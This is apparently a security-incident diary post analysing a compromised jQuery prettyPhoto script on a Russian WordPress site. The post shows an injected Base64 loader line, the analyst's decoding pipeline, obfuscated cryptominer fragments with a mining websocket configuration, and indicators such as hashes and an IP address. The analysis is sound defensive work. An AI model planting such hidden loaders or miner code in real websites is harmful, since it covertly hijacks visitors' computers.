Cryptominer Delivered Though Compromized JavaScript File
Yesterday I found an interesting compromised JavaScript file that contains extra code to perform crypto mining activities. It started with a customer's IDS alerts on the following URL:
hxxp://safeyourhealth[.]ru/wp-content/themes/wp-trustme/js/jquery.prettyphoto.js
This website is not referenced as malicious and the domain looks clean. When you point your browser to the site, it loads the JavaScript file. So, I performed some investigations on this URL. jquery.prettyphoto.js is a file from the package pretty photo[1] but the one hosted on safeyourhealth[.]ru was modified.
The original one starts like this:
(function($) { $.prettyPhoto = {version: '3.1.4'}; $.fn.prettyPhoto = function(pp_settings) { pp_settings = jQuery.extend({ ...
The malicious one started like this:
new Function(atob(“dmFyIF8weDQ5ZTY9WydjYW5jZWxlZ...Y5ZignMHgyNycpXSgpOw=="))() (function($){$.prettyPhoto={version:'3.1.4'};$.fn.prettyPhoto=function(pp_settings){pp_settings=jQuery.extend({hook:'rel',animation_speed:'fast',ajaxcallback:function() ...
The file was submitted to VT and received a score of 1/59[2]. atob() is the JavaScript function used to decode Base64. Let’s extract the payload and decode it:
$ curl —socks5 ten:9050 hxxp://safeyourhealth[.]ru/wp-content/themes/wp-trustme/js/jquery.prettyphoto.js | \ grep atob | \ awk -F ‘“‘ ‘{ print $2 }’ | \ base64 -d >jquery.prettyphoto.js.decoded $ cat jquery.prettyphoto.js.decoded var _0x49e6=['canceled','error','opt_in_canceled','_connect','lastPingReceived','getItem','parse','ident','_updateTabs','waitReconnect','dontKillTabUpdate','setItem','stringify','stats','_hashString','charCodeAt','WEBSOCKET_SHARDS','_onMessage','onerror','_onError','onclose','onopen','_onOpen','anonymous','user','toString','type','token','goal','ref','opt_in','_send','_onClose','code','job','enabled','_adjustThreads','hash_accepted','hashes','accepted','authed','Bee\x20Error:','invalid_site_key','invalid_opt_in','reset','banned','_onTargetMet','job_id','submit','nonce','result','_onVerified','send','some_code','ifExclusiveTab','FORCE_EXCLUSIVE_TAB','forceExclusiveTab','forceMultiTab','User','Anonymous','Res','URL','webkitURL','mozURL','createObjectURL','worker','onReady','currentJob','verifyJob','verifyCallback','_isReady','lastMessageTimestamp','ready','Expecting\x20first\x20message\x20to\x20be\x20\x22ready\x22,\x20got\x ...
The script is obfuscated with a very big array (_0x49e6) which contains pieces of strings and code.
You can easily spot the behaviour of the script with the following snippet of code:
var _0x348ae9 = navigator['hardwareConcurrency'] || 4;
The navigator.hardwareConcurrency is a read-only property which returns the number of logical processors available to run threads on the computer. Always interesting for a cryptominer to know how many threads can be started.
If the code was obfuscated, strings were not. More interesting strings are easy to find:
self[_0x169f('0x98')][_0x169f('0x4b')] = { 'LIB_URL': _0x169f('0xb2'), 'ASMJS_NAME': _0x169f('0xb3'), 'REQUIRES_AUTH': ![], 'WEBSOCKET_SHARDS': [['wss://wss.rand.com.ru:8843/']], 'CAPTCHA_URL': 'https://coinhive.com/captcha/', 'MINER_URL': _0x169f('0xb4'), 'AUTH_URL': 'https://authedmine.com/authenticate.html' };
I wrote a VTI hunting rule to search for scripts containing the string "navigator['hardwareConcurrency']" and I got some hits last night. All of them where submitted for the first time yesterday and got a score of 6/59:
90201bc4af1721b02cf441a80cdd94183b9bbcb0f63ee0aa9843cb02f3ae6bdb
58c2c761ca127e6392f72ac60b7f6cbf20fa52db7e7f94468e1640ee3a132c21
56a2eebc67293799a01fa74a9d206ba336bc6df5c32ae68987d110e9bcd81cc2
90201bc4af1721b02cf441a80cdd94183b9bbcb0f63ee0aa9843cb02f3ae6bdb
7fa97e4b27e8542a0fc330bdd9cadccd1bafa166269a3bf846f7663b9f992be1
835a19b59e1e2aeeb538509022581202756ee13e78b4d1c6592918ec854168bb
ded2b6d76a00a67c60f0488b2d0507334363314552edc31a1fd29fdbebc493f6
d920455b0d5f4783fb0fa3504ac14d540a3835774515cdc26284514ebad83f37
ad453a6563ee5e1c522a4405c57e0740db343ba180981f4da65a19b9b8aaa883
All of them use the same IP address: 148.251.136.203.
I also searched for similar compromized jquery.prettyphoto.js files. This code is used on many websites but I did not find other malicious occurrences. Please share if you find some.
[1] https://github.com/scaron/prettyphoto
[2] https://www.virustotal.com/#/file/977a811695dbbd370e162807e4c0fbc25c9fda8bba3417279c2f8ee1289a47e6/detection
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key
Comments